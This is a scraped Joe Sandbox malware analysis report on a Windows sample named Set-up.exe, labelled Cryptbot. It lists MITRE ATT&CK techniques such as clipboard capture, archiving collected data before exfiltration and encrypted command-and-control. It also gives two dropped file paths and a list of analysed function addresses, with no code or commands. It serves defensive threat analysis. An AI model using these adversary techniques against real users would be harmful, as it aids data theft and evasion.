Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Set-up.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Cryptbot

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Temp\WomwWuRzvwrFDpojKxBm.dll

C:\Users\user\AppData\Local\Temp\service123.exe

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Imports

Windows Analysis Report
Set-up.exe

Function 6C2914B0 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 121
COMMON

Function 008F116C Relevance: 19.7, APIs: 13, Instructions: 200
sleepstringCOMMON

Function 008F15B0 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 121
COMMON

Function 008F81E0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 116
libraryloaderCOMMON

Function 008F8230 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 62
libraryloaderCOMMON

Function 008F13C9 Relevance: 12.1, APIs: 8, Instructions: 109
stringCOMMON

Function 008F11A3 Relevance: 10.6, APIs: 7, Instructions: 115
sleepstringCOMMON

Function 008F1160 Relevance: 9.1, APIs: 6, Instructions: 131
sleepstringCOMMON

Function 6C364230 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 32
sleepsynchronizationclipboardCOMMON

Function 008F1296 Relevance: 5.1, APIs: 4, Instructions: 80
stringCOMMON

Function 008F13BB Relevance: 5.1, APIs: 4, Instructions: 66
stringCOMMON

Function 6C2AB1A0 Relevance: 1.4, APIs: 1, Instructions: 144
COMMON

Function 6C2AB310 Relevance: 1.3, APIs: 1, Instructions: 95
COMMON